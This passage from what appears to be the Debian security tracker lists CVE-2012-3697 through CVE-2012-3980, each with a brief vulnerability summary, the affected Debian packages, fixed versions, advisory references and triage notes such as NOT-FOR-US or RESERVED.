(low) [squeeze] - bugzilla (Minor issue) - bugzilla4 (bug #669643) CVE-2012-3980 (The web console in Mozilla Firefox before 15.0, Firefox ESR 10.x ...) - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3979 (Mozilla Firefox before 15.0 on Android does not properly implement ...) - iceweasel (Only affects Firefox for Android) CVE-2012-3978 (The nsLocation::CheckURL function in Mozilla Firefox before 15.0, ...) {DSA-2556-1 DSA-2554-1 DSA-2553-1} - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 CVE-2012-3977 REJECTED CVE-2012-3976 (Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, and ...) - iceweasel 10.0.7esr-1 - iceape 2.7.7-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3975 (The DOMParser component in Mozilla Firefox before 15.0, Thunderbird ...) - iceweasel (Only affects Firefox >= 10) - icedove (Only affects Firefox >= 10) - iceape (Only affects Firefox >= 10) CVE-2012-3974 (Untrusted search path vulnerability in the installer in Mozilla ...) - iceweasel (Only affects Firefox for Windows) CVE-2012-3973 (The debugger in the developer-tools subsystem in Mozilla Firefox ...) - iceweasel (Only affects Firefox >= 10) CVE-2012-3972 (The format-number functionality in the XSLT implementation in Mozilla ...) {DSA-2556-1 DSA-2554-1 DSA-2553-1} - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 CVE-2012-3971 (Summer Institute of Linguistics (SIL) Graphite 2, as used in Mozilla ...) - iceweasel (Only affects Firefox >= 10) - icedove (Only affects Firefox >= 10) - iceape (Only affects Firefox >= 10) CVE-2012-3970 (Use-after-free vulnerability in the nsTArray_base::Length function in ...) - iceweasel (Vulnerable code not present in Firefox 10.x codebase) - icedove (Vulnerable code not present in Firefox 10.x codebase) - iceape (Vulnerable code not present in Firefox 10.x codebase) CVE-2012-3969 (Integer overflow in the nsSVGFEMorphologyElement::Filter function in ...) {DSA-2556-1 DSA-2554-1 DSA-2553-1} - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 CVE-2012-3968 (Use-after-free vulnerability in the WebGL implementation in Mozilla ...) - iceweasel (Vulnerable code not present in Firefox 10.x codebase) - icedove (Vulnerable code not present in Firefox 10.x codebase) - iceape (Vulnerable code not present in Firefox 10.x codebase) CVE-2012-3967 (The WebGL implementation in Mozilla Firefox before 15.0, Firefox ESR ...) - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3966 (Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, ...) - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3965 (Mozilla Firefox before 15.0 does not properly restrict navigation to ...) - iceweasel (Only affects Firefox >= 10) CVE-2012-3964 (Use-after-free vulnerability in the gfxTextRun::GetUserData function ...) - iceweasel (Vulnerable code not present in Firefox 10.x codebase) - icedove (Vulnerable code not present in Firefox 10.x codebase) - iceape (Vulnerable code not present in Firefox 10.x codebase) CVE-2012-3963 (Use-after-free vulnerability in the js::gc::MapAllocToTraceKind ...) - iceweasel (Vulnerable code not present in Firefox 10.x codebase) - icedove (Vulnerable code not present in Firefox 10.x codebase) - iceape (Vulnerable code not present in Firefox 10.x codebase) CVE-2012-3962 (Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, ...) {DSA-2556-1 DSA-2554-1 DSA-2553-1} - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 CVE-2012-3961 (Use-after-free vulnerability in the RangeData implementation in ...) - iceweasel (Vulnerable code not present in Firefox 10.x codebase) - icedove (Vulnerable code not present in Firefox 10.x codebase) - iceape (Vulnerable code not present in Firefox 10.x codebase) CVE-2012-3960 (Use-after-free vulnerability in the ...) - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3959 (Use-after-free vulnerability in the nsRangeUpdater::SelAdjDeleteNode ...) {DSA-2556-1 DSA-2554-1 DSA-2553-1} - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 CVE-2012-3958 (Use-after-free vulnerability in the ...) - iceweasel (Vulnerable code not present in Firefox 10.x codebase) - icedove (Vulnerable code not present in Firefox 10.x codebase) - iceape (Vulnerable code not present in Firefox 10.x codebase) CVE-2012-3957 (Heap-based buffer overflow in the nsBlockFrame::MarkLineDirty function ...) - iceweasel 10.0.7esr-1 - icedove 10.0.7-1 - iceape 2.7.7-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3956 (Use-after-free vulnerability in the ...) - iceweasel (Vulnerable code not present in Firefox 10.x codebase) - icedove (Vulnerable code not present in Firefox 10.x codebase) - iceape (Vulnerable code not present in Firefox 10.x codebase) CVE-2012-3955 (ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows ...) {DSA-2551-1} - isc-dhcp 4.2.4-2 [wheezy] - isc-dhcp 4.2.2.dfsg.1-5+deb70u1 CVE-2012-3954 (Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and ...) {DSA-2519-2 DSA-2519-1 DSA-2516-1} - isc-dhcp 4.2.4-2 (bug #686174) [wheezy] - isc-dhcp 4.2.2.dfsg.1-5+deb70u1 CVE-2012-3953 (SQL injection vulnerability in admin/index.php in phpList before ...) NOT-FOR-US: phplist CVE-2012-3952 (Cross-site scripting (XSS) vulnerability in admin/index.php in phpList ...) NOT-FOR-US: phplist CVE-2012-3951 (The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL ...) NOT-FOR-US: Plixer Scrutinizer CVE-2012-3950 (The Intrusion Prevention System (IPS) feature in Cisco IOS 12.3 ...) NOT-FOR-US: Cisco IOS CVE-2012-3949 (The SIP implementation in Cisco Unified Communications Manager (CUCM) ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2012-3948 RESERVED CVE-2012-3947 RESERVED CVE-2012-3946 RESERVED CVE-2012-3945 RESERVED CVE-2012-3944 RESERVED CVE-2012-3943 RESERVED CVE-2012-3942 RESERVED CVE-2012-3941 (Heap-based buffer overflow in the Cisco WebEx Recording Format (WRF) ...) NOT-FOR-US: Cisco WebEx CVE-2012-3940 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 ...) NOT-FOR-US: Cisco WebEx CVE-2012-3939 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 ...) NOT-FOR-US: Cisco WebEx CVE-2012-3938 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 ...) NOT-FOR-US: Cisco WebEx CVE-2012-3937 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 ...) NOT-FOR-US: Cisco WebEx CVE-2012-3936 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 ...) NOT-FOR-US: Cisco WebEx CVE-2012-3935 (Cisco Unified Presence (CUP) before 8.6(3) and Jabber Extensible ...) NOT-FOR-US: Cisco Unified Presence, Jabber Extensible Communications Platform CVE-2012-3934 RESERVED CVE-2012-3933 RESERVED CVE-2012-3932 RESERVED CVE-2012-3931 RESERVED CVE-2012-3930 RESERVED CVE-2012-3929 RESERVED CVE-2012-3928 RESERVED CVE-2012-3927 RESERVED CVE-2012-3926 RESERVED CVE-2012-3925 RESERVED CVE-2012-3924 (The SSLVPN implementation in Cisco IOS 15.1 and 15.2, when DTLS is ...) NOT-FOR-US: Cisco IOS CVE-2012-3923 (The SSLVPN implementation in Cisco IOS 12.4, 15.0, 15.1, and 15.2, ...) NOT-FOR-US: Cisco IOS CVE-2012-3922 RESERVED CVE-2012-3921 RESERVED CVE-2012-3920 RESERVED CVE-2012-3919 (The Cisco Application Control Engine (ACE) module 3.0 for Cisco ...) NOT-FOR-US: Cisco Application Control Engine CVE-2012-3918 RESERVED CVE-2012-3917 RESERVED CVE-2012-3916 RESERVED CVE-2012-3915 (The DMVPN tunnel implementation in Cisco IOS 15.2 allows remote ...) NOT-FOR-US: Cisco IOS CVE-2012-3914 RESERVED CVE-2012-3913 RESERVED CVE-2012-3912 RESERVED CVE-2012-3911 RESERVED CVE-2012-3910 RESERVED CVE-2012-3909 RESERVED CVE-2012-3908 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE ...) NOT-FOR-US: Cisco Identity Services Engine CVE-2012-3907 RESERVED CVE-2012-3906 RESERVED CVE-2012-3905 RESERVED CVE-2012-3904 RESERVED CVE-2012-3903 RESERVED CVE-2012-3902 RESERVED CVE-2012-3901 (The updateTime function in sensorApp on Cisco IPS 4200 series sensors ...) NOT-FOR-US: Cisco IPS 4200 CVE-2012-3900 RESERVED CVE-2012-3899 (sensorApp on Cisco IPS 4200 series sensors 6.0, 6.2, and 7.0 does not ...) NOT-FOR-US: Cisco IPS 4200 CVE-2012-3898 RESERVED CVE-2012-3897 RESERVED CVE-2012-3896 RESERVED CVE-2012-3895 (Cisco IOS 15.0 through 15.3 allows remote authenticated users to cause ...) NOT-FOR-US: Cisco IOS CVE-2012-3894 RESERVED CVE-2012-3893 (The FlexVPN implementation in Cisco IOS 15.2 and 15.3 allows remote ...) NOT-FOR-US: Cisco IOS CVE-2012-3892 RESERVED CVE-2012-3891 RESERVED CVE-2012-3890 (The in_mod plugin in Winamp before 5.63 allows remote attackers to ...) NOT-FOR-US: Winamp CVE-2012-3889 (The in_mod plugin in Winamp before 5.63 allows remote attackers to ...) NOT-FOR-US: Winamp CVE-2012-3888 (The login implementation in AirDroid 1.0.4 beta allows remote ...) NOT-FOR-US: AirDroid CVE-2012-3887 (AirDroid before 1.0.7 beta uses a cleartext base64 format for data ...) NOT-FOR-US: AirDroid CVE-2012-3886 (AirDroid 1.0.4 beta uses the MD5 algorithm for values in the ...) NOT-FOR-US: AirDroid CVE-2012-3885 (The default configuration of AirDroid 1.0.4 beta uses a four-character ...) NOT-FOR-US: AirDroid CVE-2012-3884 (AirDroid 1.0.4 beta implements authentication through direct ...) NOT-FOR-US: AirDroid CVE-2012-3883 RESERVED CVE-2012-3882 RESERVED CVE-2012-3881 (Multiple SQL injection vulnerabilities in RTG 0.7.4 and RTG2 0.9.2 ...) NOT-FOR-US: RTG, RTG2 CVE-2012-3880 RESERVED CVE-2012-3879 RESERVED CVE-2012-3878 RESERVED CVE-2012-3877 RESERVED CVE-2012-3876 RESERVED CVE-2012-3875 RESERVED CVE-2012-3874 RESERVED CVE-2012-3873 (Multiple SQL injection vulnerabilities in Open Constructor 3.12.0 ...) NOT-FOR-US: Open Constructor CVE-2012-3872 (Multiple cross-site scripting (XSS) vulnerabilities in Open ...) NOT-FOR-US: Open Constructor CVE-2012-3871 (Cross-site scripting (XSS) vulnerability in data/hybrid/i_hybrid.php ...) NOT-FOR-US: Open Constructor CVE-2012-3870 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Open Constructor CVE-2012-3869 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: REDAXO CVE-2012-3868 (Race condition in the ns_client structure management in ISC BIND 9.9.x ...) NOTE: https://kb.isc.org/article/AA-00730 - bind9 (Vulnerable code not present, only affects 9.9.x) - isc-dhcp (embeds bind 9.8.x; this issue only affects 9.9.x) CVE-2012-3867 (lib/puppet/ssl/certificate_authority.rb in Puppet before 2.6.17 and ...) {DSA-2511-1} - puppet 2.7.18-1 CVE-2012-3866 (lib/puppet/defaults.rb in Puppet 2.7.x before 2.7.18, and Puppet ...) {DSA-2511-1} - puppet 2.7.18-1 CVE-2012-3865 (Directory traversal vulnerability in lib/puppet/reports/store.rb in ...) {DSA-2511-1} - puppet 2.7.18-1 CVE-2012-3864 (Puppet before 2.6.17 and 2.7.x before 2.7.18, and Puppet Enterprise ...) {DSA-2511-1} - puppet 2.7.18-1 CVE-2012-3862 RESERVED CVE-2012-3861 RESERVED CVE-2012-3860 RESERVED CVE-2012-3859 (Unspecified vulnerability in the WebAdmin Portal in Netsweeper has ...) NOT-FOR-US: Netsweeper WebAdmin Portal CVE-2012-3858 RESERVED CVE-2012-3857 RESERVED CVE-2012-3856 RESERVED CVE-2012-3855 RESERVED CVE-2012-3854 RESERVED CVE-2012-3853 RESERVED CVE-2012-3852 RESERVED CVE-2012-3851 RESERVED CVE-2012-3850 RESERVED CVE-2012-3849 RESERVED CVE-2012-3848 (Multiple cross-site scripting (XSS) vulnerabilities in the web console ...) NOT-FOR-US: Plixer Scrutinizer CVE-2012-3863 (channels/chan_sip.c in Asterisk Open Source 1.8.x before 1.8.13.1 and ...) {DSA-2550-1} - asterisk 1:1.8.13.1~dfsg-1 CVE-2012-3847 (slssvc.exe in Invensys Wonderware SuiteLink in Invensys InTouch 2012 ...) NOT-FOR-US: Windows utility CVE-2012-3846 (Cross-site scripting (XSS) vulnerability in index.php in PHP-pastebin ...) NOT-FOR-US: php-pastebin not in Debian CVE-2012-3845 (Buffer overflow in LAN Messenger 1.2.28 and earlier allows remote ...) NOT-FOR-US: LAN Messenger not in Debian CVE-2012-3844 (Cross-site scripting (XSS) vulnerability in vBulletin 4.1.12 allows ...) NOT-FOR-US: vBulletin not in Debian CVE-2012-3843 (Cross-site scripting (XSS) vulnerability in the registration page in ...) NOT-FOR-US: e107 not in Debian CVE-2012-3842 (Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in ...) NOT-FOR-US: DirectAdmin not in Debian CVE-2012-3841 (Untrusted search path vulnerability in KMPlayer 3.2.0.19 allows local ...) NOT-FOR-US: KMPlayer not in Debian (not the KDE interface to mplayer) CVE-2012-3840 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: MyClientBase not in Debian CVE-2012-3839 (Multiple SQL injection vulnerabilities in ...) NOT-FOR-US: MyClientBase not in Debian CVE-2012-3838 (Gekko before 1.2.0 allows remote attackers to obtain the installation ...) NOT-FOR-US: Baby Gekko not in Debian CVE-2012-3837 (Multiple cross-site scripting (XSS) vulnerabilities in ...) NOT-FOR-US: Baby Gekko not in Debian CVE-2012-3836 (Multiple cross-site scripting (XSS) vulnerabilities in Baby Gekko ...) NOT-FOR-US: Baby Gekko not in Debian CVE-2012-3835 (Multiple cross-site scripting (XSS) vulnerabilities in AlienVault Open ...) NOT-FOR-US: OSSIM not in Debian (different from Open Source Software Image Map) CVE-2012-3834 (SQL injection vulnerability in forensics/base_qry_main.php in ...) NOT-FOR-US: OSSIM not in Debian (different from Open Source Software Image Map) CVE-2012-3833 (Cross-site scripting (XSS) vulnerability in the default index page in ...) NOT-FOR-US: Quick.CMS not in Debian CVE-2012-3832 (Cross-site scripting (XSS) vulnerability in decoda/Decoda.php in ...) NOT-FOR-US: Decoda not in Debian CVE-2012-3831 (Cross-site scripting (XSS) vulnerability in decoda/templates/video.php ...) NOT-FOR-US: Decoda not in Debian CVE-2012-3830 (Cross-site scripting (XSS) vulnerability in decoda/templates/video.php ...) NOT-FOR-US: Decoda not in Debian CVE-2012-3829 (Joomla! 2.5.3 allows remote attackers to obtain the installation path ...) - joomla (bug #571794) CVE-2012-3828 (Cross-site scripting (XSS) vulnerability in Joomla! 2.5.3 allows ...) - joomla (bug #571794) CVE-2012-3827 RESERVED CVE-2011-5096 (Stack-based buffer overflow in cstore.exe in the Media Application ...) NOT-FOR-US: Avaya Aura Application Server CVE-2012-3826 (Multiple integer underflows in Wireshark 1.4.x before 1.4.13 and 1.6.x ...) - wireshark 1.6.8-1 (unimportant) [squeeze] - wireshark (vulnerable code appeared in 1.4/1.6) NOTE: not suitable for code injection NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7125 NOTE: leftover of CVE-2012-2392 CVE-2012-3825 (Multiple integer overflows in Wireshark 1.4.x before 1.4.13 and 1.6.x ...) - wireshark 1.6.8-1 (unimportant) [squeeze] - wireshark (vulnerable code appeared in 1.4/1.6) NOTE: not suitable for code injection NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7125 NOTE: leftover of CVE-2012-2392 CVE-2012-3824 RESERVED CVE-2012-3823 RESERVED CVE-2012-3822 RESERVED CVE-2012-3821 RESERVED CVE-2012-3820 RESERVED CVE-2012-3819 (Stack consumption vulnerability in dartwebserver.dll 1.9 and earlier, ...) NOT-FOR-US: dartwebserver.dll CVE-2012-3818 (The fpm exporter in Revelation 0.4.13-2 and earlier encrypts the ...) - revelation 0.4.13-1.2 (bug #680059) [squeeze] - revelation (Minor issue) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-3818 NOTE: http://knoxin.blogspot.co.uk/2012/06/revelation-password-manager-considered.html NOTE: http://als.regnet.cz/fpm2/feedback/2 CVE-2012-3817 (ISC BIND 9.4.x, 9.5.x, 9.6.x, and 9.7.x before 9.7.6-P2; 9.8.x before ...) {DSA-2517-1} - bind9 1:9.8.1.dfsg.P1-4.2 (bug #683259) - isc-dhcp (issue only affects the named service, which isn't used by isc-dhcp) NOTE: https://kb.isc.org/article/AA-00729 CVE-2012-XXXX [packagekit insecure temp file] - packagekit 0.7.6-1 (bug #678189) CVE-2012-3816 (WinRadius Server 2009 allows remote attackers to cause a denial of ...) NOT-FOR-US: WinRadius CVE-2012-3815 (Buffer overflow in RunTime.exe in Sielco Sistemi Winlog Pro SCADA ...) NOT-FOR-US: Sielco Sistemi Winlog CVE-2012-3814 (Unrestricted file upload vulnerability in font-upload.php in the Font ...) NOT-FOR-US: Wordpress plugin CVE-2012-3813 RESERVED CVE-2012-3812 (Double free vulnerability in apps/app_voicemail.c in Asterisk Open ...) {DSA-2550-1} - asterisk 1:1.8.13.1~dfsg-1 (bug #680470) [squeeze] - asterisk (Vulnerable code not present) CVE-2012-3811 (Unrestricted file upload vulnerability in ImageUpload.ashx in the ...) NOT-FOR-US: Avaya IP Office Customer Call Reporter CVE-2012-3810 RESERVED CVE-2012-3809 RESERVED CVE-2012-3808 RESERVED CVE-2012-3807 RESERVED CVE-2012-3806 RESERVED CVE-2012-3805 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) NOT-FOR-US: Kajona NOTE: HTB23097 CVE-2012-3804 RESERVED CVE-2012-3803 RESERVED CVE-2012-3802 (Unspecified vulnerability in the Post Affiliate Pro (PAP) module for ...) NOT-FOR-US: Drupal module CVE-2012-3801 REJECTED CVE-2012-3800 (Cross-site scripting (XSS) vulnerability in og.js in the Organic ...) NOT-FOR-US: Drupal module CVE-2012-3799 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...) NOT-FOR-US: Drupal module CVE-2012-3798 (The Janrain Capture module 6.x-1.0 and 7.x-1.0 for Drupal, when ...) NOT-FOR-US: Drupal module CVE-2012-3797 (Pro-face WinGP PC Runtime 3.1.00 and earlier, and ProServr.exe in ...) NOT-FOR-US: Pro-face WinGP PC Runtime CVE-2012-3796 (Pro-face WinGP PC Runtime 3.1.00 and earlier, and ProServr.exe in ...) NOT-FOR-US: Pro-face WinGP PC Runtime CVE-2012-3795 (Pro-face WinGP PC Runtime 3.1.00 and earlier, and ProServr.exe in ...) NOT-FOR-US: Pro-face WinGP PC Runtime CVE-2012-3794 (Pro-face WinGP PC Runtime 3.1.00 and earlier, and ProServr.exe in ...) NOT-FOR-US: Pro-face WinGP PC Runtime CVE-2012-3793 (Integer overflow in Pro-face WinGP PC Runtime 3.1.00 and earlier, and ...) NOT-FOR-US: Pro-face WinGP PC Runtime CVE-2012-3792 (Pro-face WinGP PC Runtime 3.1.00 and earlier, and ProServr.exe in ...) NOT-FOR-US: Pro-face WinGP PC Runtime CVE-2012-3791 (Multiple SQL injection vulnerabilities in Simple Web Content ...) NOT-FOR-US: Simple Web Content Management System CVE-2012-3790 (Cross-site scripting (XSS) vulnerability in index.php in Adiscon ...) NOT-FOR-US: Adiscon LogAnalyzer CVE-2011-5095 (The Diffie-Hellman key-exchange implementation in OpenSSL 0.9.8, when ...) - openssl 0.9.8a-1 (bug #684527) NOTE: fips version not used in Debian CVE-2012-3789 (Unspecified vulnerability in bitcoind and Bitcoin-Qt before 0.4.7rc3, ...) - bitcoin 0.5.0~rc1-1 CVE-2012-3788 RESERVED CVE-2012-3787 RESERVED CVE-2012-3786 RESERVED CVE-2012-3785 RESERVED CVE-2012-3784 RESERVED CVE-2012-3783 RESERVED CVE-2012-3782 RESERVED CVE-2012-3781 RESERVED CVE-2012-3780 RESERVED CVE-2012-3779 RESERVED CVE-2012-3778 RESERVED CVE-2012-3777 RESERVED CVE-2012-3776 RESERVED CVE-2012-3775 RESERVED CVE-2012-3774 RESERVED CVE-2012-3773 RESERVED CVE-2012-3772 RESERVED CVE-2012-3771 RESERVED CVE-2012-3770 RESERVED CVE-2012-3769 RESERVED CVE-2012-3768 RESERVED CVE-2012-3767 RESERVED CVE-2012-3766 RESERVED CVE-2012-3765 RESERVED CVE-2012-3764 RESERVED CVE-2012-3763 RESERVED CVE-2012-3762 RESERVED CVE-2012-3761 RESERVED CVE-2012-3760 RESERVED CVE-2012-3759 RESERVED CVE-2012-3758 (Buffer overflow in Apple QuickTime before 7.7.3 allows remote ...) NOT-FOR-US: QuickTime CVE-2012-3757 (Apple QuickTime before 7.7.3 allows remote attackers to execute ...) NOT-FOR-US: QuickTime CVE-2012-3756 (Buffer overflow in Apple QuickTime before 7.7.3 allows remote ...) NOT-FOR-US: QuickTime CVE-2012-3755 (Buffer overflow in Apple QuickTime before 7.7.3 allows remote ...) NOT-FOR-US: QuickTime CVE-2012-3754 (Use-after-free vulnerability in the Clear method in the ActiveX ...) NOT-FOR-US: QuickTime CVE-2012-3753 (Buffer overflow in the plugin in Apple QuickTime before 7.7.3 allows ...) NOT-FOR-US: QuickTime CVE-2012-3752 (Multiple buffer overflows in Apple QuickTime before 7.7.3 allow remote ...) NOT-FOR-US: QuickTime CVE-2012-3751 (Use-after-free vulnerability in the plugin in Apple QuickTime before ...) NOT-FOR-US: QuickTime CVE-2012-3750 (The Passcode Lock implementation in Apple iOS before 6.0.1 does not ...) NOT-FOR-US: iOS CVE-2012-3749 (The extensions APIs in the kernel in Apple iOS before 6.0.1 provide ...) NOT-FOR-US: iOS CVE-2012-3748 (Race condition in WebKit in Apple iOS before 6.0.1 and Safari before ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3747 (WebKit, as used in Apple iOS before 6, allows remote attackers to ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3746 (UIWebView in UIKit in Apple iOS before 6 does not properly use the ...) NOT-FOR-US: Webkit / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3745 (Off-by-one error in Telephony in Apple iOS before 6 allows remote ...) NOT-FOR-US: Telephony in Apple iOS CVE-2012-3744 (Telephony in Apple iOS before 6 uses an SMS message's return address ...) NOT-FOR-US: Telephony in Apple iOS CVE-2012-3743 (The System Logs implementation in Apple iOS before 6 does not restrict ...) NOT-FOR-US: Apple iOS CVE-2012-3742 (Safari in Apple iOS before 6 does not properly restrict use of an ...) NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3741 (The Restrictions (aka Parental Controls) implementation in Apple iOS ...) NOT-FOR-US: Apple iOS CVE-2012-3740 (The Passcode Lock implementation in Apple iOS before 6 does not ...) NOT-FOR-US: Apple iOS CVE-2012-3739 (The Passcode Lock implementation in Apple iOS before 6 allows ...) NOT-FOR-US: Apple iOS CVE-2012-3738 (The Emergency Dialer screen in the Passcode Lock implementation in ...) NOT-FOR-US: Apple iOS CVE-2012-3737 (The Passcode Lock implementation in Apple iOS before 6 does not ...) NOT-FOR-US: Apple iOS CVE-2012-3736 (The Passcode Lock implementation in Apple iOS before 6 allows ...) NOT-FOR-US: Apple iOS CVE-2012-3735 (The Passcode Lock implementation in Apple iOS before 6 does not ...) NOT-FOR-US: Apple iOS CVE-2012-3734 (Office Viewer in Apple iOS before 6 writes cleartext document data to ...) NOT-FOR-US: Apple iOS CVE-2012-3733 (Messages in Apple iOS before 6, when multiple iMessage e-mail ...) NOT-FOR-US: Apple iOS CVE-2012-3732 (Mail in Apple iOS before 6 uses an S/MIME message's From address as ...) NOT-FOR-US: Apple iOS CVE-2012-3731 (Mail in Apple iOS before 6 does not properly implement the Data ...) NOT-FOR-US: Apple iOS CVE-2012-3730 (Mail in Apple iOS before 6 does not properly handle reuse of ...) NOT-FOR-US: Apple iOS CVE-2012-3729 (The Berkeley Packet Filter (BPF) interpreter implementation in the ...) NOT-FOR-US: Apple iOS CVE-2012-3728 (The kernel in Apple iOS before 6 dereferences invalid pointers during ...) NOT-FOR-US: Apple iOS CVE-2012-3727 (Buffer overflow in the IPsec component in Apple iOS before 6 allows ...) NOT-FOR-US: Apple iOS CVE-2012-3726 (Double free vulnerability in ImageIO in Apple iOS before 6 allows ...) NOT-FOR-US: Apple iOS CVE-2012-3725 (The DNAv4 protocol implementation in the DHCP component in Apple iOS ...) NOT-FOR-US: Apple iOS CVE-2012-3724 (CFNetwork in Apple iOS before 6 does not properly identify the host ...) NOT-FOR-US: Apple iOS CVE-2012-3723 (Apple Mac OS X before 10.7.5 does not properly handle the bNbrPorts ...) NOT-FOR-US: Apple Mac OS X CVE-2012-3722 (The Sorenson codec in QuickTime in Apple Mac OS X before 10.7.5, and ...) NOT-FOR-US: QuickTime in Apple Mac OS X CVE-2012-3721 (Profile Manager in Apple Mac OS X before 10.7.5 does not properly ...) NOT-FOR-US: Apple Mac OS X CVE-2012-3720 (Mobile Accounts in Apple Mac OS X before 10.7.5 and 10.8.x before ...) NOT-FOR-US: Apple Mac OS X CVE-2012-3719 (Mail in Apple Mac OS X before 10.7.5 does not properly handle embedded ...) NOT-FOR-US: Apple Mac OS X CVE-2012-3718 (Apple Mac OS X before 10.7.5 and 10.8.x before 10.8.2 allows local ...) NOT-FOR-US: Apple Mac OS X CVE-2012-3717 RESERVED CVE-2012-3716 (CoreText in Apple Mac OS X 10.7.x before 10.7.5 allows remote ...) NOT-FOR-US: Apple Mac OS X CVE-2012-3715 (Apple Safari before 6.0.1 makes http requests for https URIs in ...) NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3714 (The Form Autofill feature in Apple Safari before 6.0.1 does not ...) NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3713 (Apple Safari before 6.0.1 does not properly handle the Quarantine ...) NOT-FOR-US: Apple Safari / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3712 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3711 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3710 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3709 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3708 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3707 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3706 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3705 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3704 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3703 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3702 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3701 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3700 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3699 (WebKit, as used in Apple iTunes before 10.7, allows remote attackers ...) NOT-FOR-US: Apple iTunes / if anything of this affects Chromium, the Chrome sec team will know and fix CVE-2012-3698 (Apple Xcode before 4.4 does not properly compose a designated ...) NOT-FOR-US: Apple Xcode CVE-2012-3697 (WebKit in Apple Safari before 6.0 does not properly handle file: URLs, ...) NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix 